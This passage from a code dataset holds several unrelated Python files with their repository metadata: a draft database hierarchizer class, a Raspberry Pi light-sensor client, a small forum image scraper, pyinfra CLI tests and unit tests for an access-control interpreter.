default_init(self,\n\t\t\t\t\t\t_HierarchizingNodeStr=\"Component\",\n\t\t\t\t\t\t_HierarchizingDatabaseNodeStr=\"\",\n\t\t\t\t\t\t_HierarchizingDatabaseKeyStr=\"\",\n\t\t\t\t\t\t_HierarchizedNodeVariablesList=None,\n\t\t\t\t\t\t_HierarchizedDeriveDatabasersList=None,\n\t\t\t\t\t\t_HierarchizedKeyStrsList=None,\n\t\t\t\t\t\t_HierarchizedRetrieveIndexesListColumnStrsList=None,\n\t\t\t\t\t\t_HierarchizedRetrieveIndexesListGetStrsList=None,\n\t\t\t\t\t\t_HierarchizedInsertIndexIntsList=None,\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\n\t\t#Call the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\t#@Hooker.HookerClass(**{\n\t#\t\t\t\t\t\t'HookingAfterVariablesList':[\n\t#\t\t\t\t\t\t\t{'CallingMethodStr':'join'},\n\t#\t\t\t\t\t\t\t{'CallingVariable':Featurer.FeaturerClass.model}\n\t#\t\t\t\t\t\t]\n\t#\t\t\t\t\t}\n\t#)\n\t@Switcher.SwitcherClass()\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\n\tdef model(self):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['HierarchizingNodeStr']))\n\t\t'''\n\n\t\t#\n\t\t#hierarchy first\n\t\tself.hierarchize()\n\t\t#\n\t\t\n\t\t#debug\n\t\t'''\n\t\tself.debug('Add in the ModelingDescriptionTuplesList')\n\t\t'''\n\t\t\n\t\t#set\n\t\tif len(self.HierarchizedRetrieveIndexesListColumnStrsList)>0:\n\t\t\tself.ModelingDescriptionTuplesList=map(\n\t\t\t\tlambda 
__HierarchizedRetrieveIndexesListGetStr,__HierarchizedRetrieveIndexesListColumnStr:\n\t\t\t\t(\n\t\t\t\t\t__HierarchizedRetrieveIndexesListGetStr,\n\t\t\t\t\t__HierarchizedRetrieveIndexesListColumnStr,\n\t\t\t\t\ttables.Int64Col(shape=2)\n\t\t\t\t),\n\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\tself.HierarchizedRetrieveIndexesListColumnStrsList\n\t\t\t)+self.ModelingDescriptionTuplesList\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['ModelingDescriptionTuplesList']))\n\t\t'''\n\n\t\t#\n\t\t#call the base model method then\n\t\tBaseClass.model(self)\n\t\t#\n\t\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t@Switcher.SwitcherClass()\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\n\tdef table(self):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t'HierarchizingNodeStr',\n\t\t\t\t\t\t\t\t]))\n\t\t'''\n\n\t\t#\n\t\t#database firstand hierarchy first\n\t\tself.database()\n\t\tself.hierarchize()\n\t\t#/\n\n\t\t#Check\n\t\tif self.HierarchizingNodeStr!=\"\":\n\n\t\t\t#structure first in the parent pointer and then table\n\t\t\tif self.NodePointDeriveNoder!=None:\n\n\t\t\t\t#Check\n\t\t\t\tif self.HdformatedFileVariable==None:\n\n\t\t\t\t\t#debug\n\t\t\t\t\tself.debug(\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t'We have to structure first'\n\t\t\t\t\t\t\t]\n\t\t\t\t\t\t)\n\n\t\t\t\t\t#structure by also tabling at the same time\n\t\t\t\t\tself.NodePointDeriveNoder.structure(\n\t\t\t\t\t\t**{\n\t\t\t\t\t\t\t'ParentingNodeStr':self.HierarchizingNodeStr\n\t\t\t\t\t\t}\n\t\t\t\t\t)\n\n\t\t\t\t\t#Table all the Hierarchized databasers and init the corresponding HierarchizedRetrieveIndexesList in the NodePointDeriveNoder\n\t\t\t\t\tself.NodePointDeriveNoder.update(\n\t\t\t\t\t\tzip(\n\t\t\t\t\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\t\t\t\t\tmap(\n\t\t\t\t\t\t\t\t\tlambda __HierarchizedDeriveDatabaser:\n\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t__HierarchizedDeriveDatabaser.table(\n\t\t\t\t\t\t\t\t\t\t\t).TabledInt,\n\t\t\t\t\t\t\t\t\t\t-1\n\t\t\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t\t\tself.HierarchizedDeriveDatabasersList\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t)\n\n\t\t\n\t\t#\n\t\tBaseClass.table(self)\n\t\t#\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\t\n\tdef row(self):\n\n\t\t#\n\t\t#table first\n\t\tself.table()\n\t\t#\n\n\t\t#set\n\t\tself.HierarchizedInsertIndexIntsList=map(\n\t\t\t\t\tlambda __HierarchizedDeriveDatabaser:\n\t\t\t\t\t__HierarchizedDeriveDatabaser.row().RowedIndexInt,\n\t\t\t\t\tself.HierarchizedDeriveDatabasersList\n\t\t\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t'RowedHierarchyInsertIndexIntsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListGetStrsList'\n\n\t\t\t\t\t\t\t\t]))\n\t\t'''\n\n\t\t#set the modeled int in the retrieve tuples\n\t\tmap(\n\t\t\t\tlambda __HierarchizedRetrieveIndexesListGetStr,__RowedHierarchyInsertIndexInt:\n\t\t\t\tgetattr(\n\t\t\t\t\tself.NodePointDeriveNoder,\n\t\t\t\t\t__HierarchizedRetrieveIndexesListGetStr\n\t\t\t\t\t).__setitem__(\n\t\t\t\t\t\t1,\n\t\t\t\t\t\t__RowedHierarchyInsertIndexInt\n\t\t\t\t),\n\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\tself.HierarchizedInsertIndexIntsList\n\t\t\t)\n\t\n\n\t\t#debug\n\t\t'''\n\t\tself.debug([\n\t\t\t\t\t\t('Before updating the RowingKeyStrsList'),\n\t\t\t\t\t\t#('self.',self,['NodePointDeriveNoder'])\n\t\t\t\t\t\t('model first to set the 
ModeledGetStrToColumStr')\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['RowingKeyStrsList']))\n\t\t'''\n\n\t\t#Add in the RowingKeyStrsList\n\t\tself.RowingKeyStrsList=self.HierarchizedRetrieveIndexesListGetStrsList+self.RowingKeyStrsList\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'Now row with Featurer',\n\t\t\t\t\t\t('self.',self,['RowingKeyStrsList'])\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#\n\t\t#row then\n\t\tBaseClass.row(self)\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug('Ok row is over for hierarchizing')\n\t\t'''\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\n\tdef insert(self):\n\t\t\t\t\n\t\t#\n\t\t#row first\n\t\tself.row()\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'First make insert the Hierarchized databases',\n\t\t\t\t\t\t('self.',self,['HierarchizedNodeVariablesList'])\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#Insert the Hierarchized databases\n\t\tself.HierarchizedInsertIndexIntsList=map(\n\t\t\t\t\tlambda __HierarchizedDeriveDatabaser:\n\t\t\t\t\t__HierarchizedDeriveDatabaser.insert(),\n\t\t\t\t\tself.HierarchizedDeriveDatabasersList\n\t\t\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'First make insert the Hierarchized databases',\n\t\t\t\t\t\t('self.',self,['HierarchizedNodeVariablesList'])\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#debug\n\t\t'''\n\t\tself.debug('Now we can insert')\n\t\t'''\n\n\t\t#\n\t\t#insert then\n\t\tBaseClass.insert(self)\n\t\t#\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t@Imitater.ImitaterClass()\n\tdef retrieve(self):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['RetrievingIndexesList']))\n\t\t'''\n\n\t\t#\n\t\t#retrieve first\n\t\tBaseClass.retrieve(self)\n\t\t#\n\n\t\t#Retrieve in the joined databases\n\t\tself.HierarchizedInsertIndexIntsList=map(\n\t\t\t\t\tlambda __HierarchizedRetrieveIndexesListGetStr,__HierarchizedDeriveDatabaserPointer:\n\t\t\t\t\t__HierarchizedDeriveDatabaserPointer.retrieve(\n\t\t\t\t\t\tgetattr(\n\t\t\t\t\t\t\tself.NodePointDeriveNoder,\n\t\t\t\t\t\t\t__HierarchizedRetrieveIndexesListGetStr\n\t\t\t\t\t\t)\n\t\t\t\t\t),\n\t\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\t\tself.HierarchizedDeriveDatabaserPointersList\n\t\t\t\t)\n\n\t@Switcher.SwitcherClass()\n\t#@Argumenter.ArgumenterClass()\n\tdef do_hierarchize(\t\n\t\t\t\tself\n\t\t\t):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['HierarchizingNodeStr']))\n\t\t'''\n\n\t\tif self.HierarchizingDatabaseNodeStr==\"\":\n\t\t\tself.HierarchizingDatabaseNodeStr=self.ModelingNodeStr\n\n\t\t#Init a default value\n\t\tif self.HierarchizingDatabaseKeyStr==\"\":\n\t\t\tself.HierarchizingDatabaseKeyStr=self.ModeledCollectionKeyStr\n\n\t\t#Check\n\t\tif self.HierarchizingNodeStr!=\"\":\n\n\t\t\t#Check\n\t\t\tif self.NodePointDeriveNoder!=None:\n\t\t\t\t\t\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug('Look for the hierarchized variables...')\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedNodeVariablesList=self.NodePointDeriveNoder[\n\t\t\t\t\t\tNoder.NodingPrefixGetStr+self.HierarchizingNodeStr+Noder.NodingSuffixGetStr\n\t\t\t\t\t]\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,['HierarchizedNodeVariablesList']))\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedDeriveDatabasersList=map(\n\t\t\t\t\tlambda __HierarchizedNodeVariable:\n\t\t\t\t\tSYS._filter(\n\t\t\t\t\t\t\tlambda 
__NodedDatabaser:\n\t\t\t\t\t\t\tgetattr(\n\t\t\t\t\t\t\t\t__NodedDatabaser,\n\t\t\t\t\t\t\t\t'Noded'+self.HierarchizingDatabaseNodeStr+'KeyStr'\n\t\t\t\t\t\t\t\t).startswith(\n\t\t\t\t\t\t\t\tself.HierarchizingDatabaseKeyStr\n\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\tgetattr(\n\t\t\t\t\t\t\t\t\t__HierarchizedNodeVariable,\n\t\t\t\t\t\t\t\t\t'Noded'+self.HierarchizingDatabaseNodeStr+'OrderedDict'\n\t\t\t\t\t\t\t).values()\n\t\t\t\t\t)[0],\n\t\t\t\t\tself.HierarchizedNodeVariablesList\n\t\t\t\t)\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,['HierarchizedDeriveDatabasersList']))\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedKeyStrsList=map(\n\t\t\t\t\tlambda __HierarchizedVariable:\n\t\t\t\t\tgetattr(\n\t\t\t\t\t\t__HierarchizedVariable,\n\t\t\t\t\t\tself.NodePointDeriveNoder.NodedKeyStrKeyStr\n\t\t\t\t\t),\n\t\t\t\t\tself.HierarchizedNodeVariablesList\n\t\t\t\t)\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,['HierarchizedKeyStrsList']))\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedRetrieveIndexesListColumnStrsList=map(\n\t\t\t\t\t\tlambda __HierarchizedKeyStr:\n\t\t\t\t\t\t'Hierarchized'+__HierarchizedKeyStr+'RetrieveIndexesList',\n\t\t\t\t\t\tself.HierarchizedKeyStrsList\n\t\t\t\t\t)\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList=map(\n\t\t\t\t\t\tlambda __HierarchizedKeyStr:\n\t\t\t\t\t\t'Hierarchized'+self.ModelingNodeStr+self.ModeledCollectionKeyStr+'To'+__HierarchizedKeyStr+'RetrieveIndexesList',\n\t\t\t\t\t\tself.HierarchizedKeyStrsList\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListColumnStrsList',\n\t\t\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListGetStrsList'\n\t\t\t\t\t\t\t\t\t\t]))\n\t\t\t\t'''\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\n#\n\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/ShareYourSystem/Standards/Modelers/Hierarchizer/Drafts/__init__ copy.py","file_name":"__init__ copy.py","file_ext":"py","file_size_in_byte":10213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26525576812","text":"from time import sleep\nimport RPi.GPIO as GPIO\nfrom datetime import datetime\nimport config\nimport client_socket\nimport light_businesslogic\n\n#global variable to keep track of the light status\nis_light_on = False\n\n#create the socket connection, read the light sensor data and start sending to server\ndef start_client(config):\n    try:\n        light_id = config.get('common', 'lightsensoridentifier')\n        delay = int(config.get('client', 'lightdelay'))\n        sensor_pin = int(config.get('client', 'lightsensorpin'))\n        global is_light_on\n        \n        #repeat the sensor read after a delay\n        while True: \n            light_data = read_sensor_data(sensor_pin) \n            \n            is_low_light = light_businesslogic.check_light_level(int(light_data))\n            \n            if is_low_light == True:\n                time = datetime.now().time()\n                data = \",\".join([light_id, str(light_data), str(time)])\n\n                res = client_socket.send_data(data)\n                print('Light On', is_light_on)\n                is_light_on = light_businesslogic.set_mode(res, is_light_on)\n            \n            elif is_light_on == True:\n                is_light_on = light_businesslogic.set_mode(False, is_light_on)\n            \n            #wait for some time before sending next data\n            sleep(delay)\n    \n    except Exception as e:\n        print(f\"Error: {e}\")\n    \n    finally:\n        sleep(delay)\n\n#Read the data from sensor\ndef read_sensor_data(sensor_pin):\n    # Set BOARD mode for GPIO numbering\n    GPIO.setmode(GPIO.BOARD)\n    \n    # 
Setup the GPIO pin for input\n    GPIO.setup(sensor_pin, GPIO.IN)\n    \n    # Read the sensor value\n    sensor_value = GPIO.input(sensor_pin)    \n    \n    return sensor_value    \n\nif __name__ == \"__main__\":\n    config = config.getconfig()\n    start_client(config)","repo_name":"babars98/SmartHome","sub_path":"src/client/light_sensor_client.py","file_name":"light_sensor_client.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16512468936","text":"import requests\nimport re\nimport os\n\nif __name__ == '__main__':\n    #create the output folder\n    if not os.path.exists('./糗图'):\n        os.mkdir('./糗图')\n    url = 'https://tieba.baidu.com/f?kw=%F4%DC%CA%C2%B0%D9%BF%C6&fr=ala0&tpl=5&dyTabStr=MCwzLDIsNiwxLDQsNSw3LDgsOQ%3D%3D'\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.54'\n    }\n    response = requests.get(url=url, headers=headers)\n    text = response.text\n    ex = ''\n    imgSrc = re.findall(ex, text, re.S)\n    print(imgSrc)\n\n    '''\n    for src in imgSrc:\n        #concatenate the full url\n        src='https:'+src\n        img_data=requests.get(url=src,headers=headers).content\n        #generate the image name: split on '/' and take the last segment as the name\n        img_name=src.split('/')[-1]\n        imgPath='./糗图/'+img_name\n        with open(imgPath,'wb',)as fp:\n            fp.write(img_data)\n            print(img_name,'ok!')\n    '''\n\n\n\n\n","repo_name":"Risingrode/Python","sub_path":"爬虫/b站爬虫合集/数据解析/糗图.py","file_name":"糗图.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70513893212","text":"import os\nimport sys\nfrom datetime import datetime\nfrom io import StringIO\nfrom unittest import TestCase\n\nimport pytest\n\nfrom pyinfra.operations import server\nfrom pyinfra_cli.commands import get_func_and_args\nfrom pyinfra_cli.exceptions import CliError\nfrom pyinfra_cli.util import json_encode\n\n\nclass TestCliUtil(TestCase):\n    def test_json_encode_function(self):\n        assert json_encode(get_func_and_args) == \"Function: get_func_and_args\"\n\n    def test_json_encode_datetime(self):\n        now = datetime.utcnow()\n        assert json_encode(now) == now.isoformat()\n\n    def test_json_encode_file(self):\n        file = StringIO()\n        assert json_encode(file) == \"In memory file: \"\n\n    def test_json_encode_set(self):\n        assert json_encode({1, 2, 3}) == [1, 2, 3]\n\n    def test_setup_no_module(self):\n        with self.assertRaises(CliError) as context:\n            get_func_and_args((\"no.op\",))\n        assert context.exception.message == \"No such module: pyinfra.operations.no\"\n\n    def test_setup_no_op(self):\n        with self.assertRaises(CliError) as context:\n            get_func_and_args((\"server.no\",))\n\n        assert (\n            context.exception.message == \"No such attribute in module pyinfra.operations.server: no\"\n        )\n\n    def test_setup_op_and_args(self):\n        commands = (\"pyinfra.operations.server.user\", \"one\", \"two\", \"hello=world\")\n\n        assert get_func_and_args(commands) == (\n            server.user,\n            ([\"one\", \"two\"], {\"hello\": \"world\"}),\n        )\n\n    def test_setup_op_and_json_args(self):\n        commands = (\"server.user\", '[[\"one\", \"two\"], {\"hello\": \"world\"}]')\n\n        assert get_func_and_args(commands) == (\n            server.user,\n            ([\"one\", \"two\"], {\"hello\": \"world\"}),\n        )\n\n\n@pytest.fixture(scope=\"function\")\ndef user_sys_path():\n    user_pkg = os.path.dirname(__file__) + \"/user\"\n    sys.path.append(user_pkg)\n    yield None\n    sys.path.pop()\n    to_rm = []\n    for k, v in sys.modules.items():\n        v = getattr(v, \"__file__\", \"\")\n        
if isinstance(v, str) and v.startswith(user_pkg):\n to_rm.append(k)\n for k in to_rm:\n del sys.modules[k]\n\n\n# def test_no_user_op():\n# commands = ('test_ops.dummy_op', 'arg1', 'arg2')\n# with pytest.raises(CliError, match='^No such module: test_ops$'):\n# get_func_and_args(commands)\n\n\ndef test_user_op(user_sys_path):\n commands = (\"test_ops.dummy_op\", \"arg1\", \"arg2\")\n res = get_func_and_args(commands)\n\n import test_ops\n\n assert res == (test_ops.dummy_op, ([\"arg1\", \"arg2\"], {}))\n","repo_name":"Fizzadar/pyinfra","sub_path":"tests/test_cli/test_cli_util.py","file_name":"test_cli_util.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":2300,"dataset":"github-code","pt":"32"} +{"seq_id":"17346086489","text":"from src.build import build\nfrom src.interface.interpreter import interpreter\nfrom src.database_setup import accessControlUser as acs_module\nfrom src.interface.executer import executer\nimport mock\n\nclass Test_command_list_to_str:\n\n def test_command_list_to_str(self):\n list_test = (\"test1\",\"test2\")\n\n result_str = build._command_list_to_str(list_test)\n assert result_str == \"test1 test2\"\n\nclass Test_build_list_of_packages:\n\n def test_intel_build_list_of_packages(self):\n intel_test = \"x86_64\"\n\n result = build._build_list_of_packages(intel_test)\n assert result == ['mysql-client', 'mysql-server', 'automake', 'make',\n 'python3', 'python3-pip', 'gcc', 'python3-mysqldb']\n\n def test_arm_build_list_of_packages(self):\n arm_test = \"armvl7\"\n\n result = build._build_list_of_packages(arm_test)\n assert result == ['mariadb-client', 'mariadb-server', 'automake', 'make', \n 'python3', 'python3-pip', 'gcc', 'python3-mysqldb']\n\n def test_invalid_build_list_of_packages(self):\n inv_test = \"something\"\n\n result = build._build_list_of_packages(inv_test)\n assert result == None\n\nclass Test_users_can_run:\n\n def test_user_can_run_as_root(self):\n command_test = \"root can run command written in any way\"\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.user_can_run(i, command_test)\n assert result == True\n \n def test_normal_user_can_run(self):\n command_test = \"retrieve_description_from_group\"\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.user_can_run(i, command_test)\n assert result == True\n\n def test_normal_user_cannot_run(self):\n command_test = \"normal user cannot run commands written anyway\"\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.user_can_run(i, command_test)\n assert result == False\n\nclass Test_print_command_table:\n\n def test_print_command_table_as_root(self):\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.print_command_table(i)\n assert result == (\"add_user_info (name, username, password, MAC)\\n\" +\n \"change_group_description (description, number)\\n\" +\n \"check_access ()\\n\" +\n \"define_new_group (number, description)\\n\" +\n \"edit_user (name, username, password, group_number, MAC)\\n\" +\n \"give_access (group_number, facility_name)\\n\" +\n \"insert_new_facility (name)\\n\" +\n \"insert_new_user (name, MAC, username, password)\\n\" +\n \"remove_access (group_number, facility_name)\\n\" +\n 
\"remove_facility (name)\\n\" +\n \"remove_group (number)\\n\" +\n \"remove_user (MAC, username)\\n\" +\n \"retrieve_all_users ()\\n\" +\n \"retrieve_description_from_group (number)\\n\" +\n \"retrieve_info_from_username (username)\\n\" +\n \"retrieve_my_info ()\\n\")\n\n def test_print_command_table_as_normal_user(self):\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.print_command_table(i)\n assert result == (\"check_access ()\\n\" +\n \"retrieve_description_from_group (number)\\n\" +\n \"retrieve_my_info ()\\n\")\n\nclass Test_parse_command:\n\n def test_parse_valid_command(self):\n command_test = \"define_new_group(number=1,description=test)\"\n\n i = interpreter()\n\n result = interpreter.parse_command(i, command_test)\n assert result == (\"define_new_group\",{\"number\":\"1\", \"description\":\"test\"})\n \n def test_parse_argless_command(self):\n command_test = \"check_access()\"\n\n i = interpreter()\n\n result = interpreter.parse_command(i, command_test)\n assert result == (\"check_access\",None)\n\nclass Test_execute_from_interpreter:\n\n def test_execute_invalid_command(self):\n command_test = \"Commands cannot be written anyway\"\n\n i = interpreter()\n\n result = interpreter.execute(i,command_test)\n assert result == (\"PARSER: Invalid command.\")\n \n def test_execute_nonexistent_command(self):\n command_test = \"unexistent_command(args_dont_matter)\"\n\n i = interpreter()\n\n result = interpreter.execute(i,command_test)\n assert result == (\"PARSER: Command does not exist.\")\n\n def test_execute_command_with_wrong_arguments(self):\n command_test = \"define_new_group(wrong_argument=any_value)\"\n\n i = interpreter()\n\n result = interpreter.execute(i,command_test)\n assert result == (\"PARSER: Wrong arguments in command.\")\n\n @mock.patch(\"src.interface.executer.executer\")\n def test_execute_valid_command(self, exc_mock):\n exc_inst = mock.MagicMock()\n exc_inst.execute.return_value = \"Mocked output\" # pretty print output\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n command_test = \"define_new_group(number=1,description=test)\" #just a valid command for parsing to complete\n \n i = interpreter()\n i.current_user = user_test\n i.command_executer = exc_inst\n \n result = interpreter.execute(i,command_test)\n assert result == (\"Mocked output\")\n\nclass Test_pretty_print:\n\n def test_valid_pretty_print(self):\n list_of_dicts_test = ( {\"1\":\"2\",\"3\":\"4\"}, {\"5\":\"6\",\"7\":\"8\"} )\n\n result = executer.pretty_print(None, list_of_dicts_test)\n assert result == \"1: 2 | 3: 4 | \\n\\n5: 6 | 7: 8 | \\n\\n\"\n \n def test_invalid_pretty_print(self):\n not_a_list_of_dicts_test = \"anything\"\n\n result = executer.pretty_print(None, not_a_list_of_dicts_test)\n assert result == \"Return from SQL querry is not printable.\"\n\nclass Test_execute_from_executer:\n\n def test_execute_command_with_errors(self):\n command_test = \"test\"\n command_table_test = {\"command\":\"not_test\"}\n\n result = executer.execute(None, None, command_test, None, command_table_test)\n assert result == 1\n \n def test_execute_root_command_as_normal_user(self):\n command_test = \"test\"\n command_table_test = {\"command\":(\"type\",\"order\")}\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n result = executer.execute(None, user_test, command_test, None, command_table_test)\n assert result == 1\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") 
\n def test_execute_root_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"retrieve_all_users\"\n command_table_test = {\"retrieve_all_users\":(\"root\",\"\")} #command type = root\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, None, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsgroup_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"define_new_group\"\n args_test = {\"number\":1,\"description\":\"test\"}\n command_table_test = {\"define_new_group\":(\"acsgroup\",\"\")} #command type = acsgroup\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsuser_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"insert_new_user\"\n args_test = {\"name\":\"test\",\"username\":\"test\",\"MAC\":\"test\",\"password\":\"test\",\"group_number\":\"teste\"}\n command_table_test = {\"insert_new_user\":(\"acsuser\",\"\")} #command type = acsuser\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n \n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsfacility_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"insert_new_facility\"\n args_test = {\"name\":\"test\"}\n command_table_test = {\"insert_new_facility\":(\"acsfacility\",\"\")} #command type = acsfacility\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsaccess_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"give_access\"\n args_test = {\"group_number\":\"1\", \"facility_name\":\"test\"}\n command_table_test = {\"give_access\":(\"acsaccess\",\"\")} #command type = acsaccess\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_str_type_command_as_normal_user(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"retrieve_description_from_group\"\n args_test = {\"number\":1}\n command_table_test = {\"retrieve_description_from_group\":(\"str\",\"\")} #command type = 
str\n        user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n        e = skip_init(executer)\n        e.db_driver = dbDriver_inst\n        e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n        result = e.execute(user_test, command_test, args_test, command_table_test)\n        assert result == \"Mocked Output\"\n\n    @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n    def test_execute_self_type_command_as_normal_user(self, dbDriver_mock):\n        dbDriver_inst = mock.MagicMock()\n        command_test = \"retrieve_my_info\"\n        command_table_test = {\"retrieve_my_info\":(\"self\",\"\")} #command type = self\n        user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n        e = skip_init(executer)\n        e.db_driver = dbDriver_inst\n        e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n        result = e.execute(user_test, command_test, None, command_table_test)\n        assert result == \"Mocked Output\"\n\n#to make it possible to test executer.execute()\ndef skip_init(cls):\n    actual_init = cls.__init__\n    cls.__init__ = lambda *args, **kwargs: None\n    instance = cls()\n    cls.__init__ = 